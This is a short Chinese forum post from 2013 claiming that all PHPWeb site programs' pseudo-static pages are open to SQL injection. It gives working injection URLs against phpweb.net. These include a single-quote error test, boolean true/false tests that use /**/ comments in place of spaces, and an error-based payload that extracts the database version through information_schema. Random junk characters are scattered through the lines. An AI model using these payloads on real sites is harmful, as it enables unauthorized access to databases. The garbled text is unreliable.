phpweb所有的整站程序伪静态页面都存在sql注入
$ ~0 Y! G* C1 l7 `: n
( Z& T8 I- o! Z3 ^6 J主站:http://phpweb.net/ R5 `8 @* X% m4 ?) b* h, N
加’检测:8 }% J' H+ V5 t3 B1 L- b' N
7 n t7 e& N7 I
http://www.phpweb.net/down/html/?772′.html5 p$ T& A5 X* `! Y: v
# M1 y# f# X4 Z, O& r$ ?6 M& a# y出错
8 U3 H6 q. q, W7 ]7 Z存在注入。
( M$ p' Y* ]$ W4 [9 W+ E不能用空格,只能用/*罗& C' v7 z; ^0 J7 l7 w2 [
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常# T+ |" p5 b* G) i
3 L) K9 N/ P1 t2 ~: Ghttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.3 @! L) V- R) ?' H% O$ |0 O" G( r
爆数据库版本:
% G+ v1 C# x4 \
8 ^. U+ T; a0 [& t?) O+ r' H( J, }$ V1 [
1% H- p+ r) o# b$ j V; v
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html# v% A& S# O/ F6 t
更新日期: 2013-01-03 13:39:50
: w6 f( B |0 m6 r$ W |
发表于 2013-1-4 19:46:42
收藏
支持
反对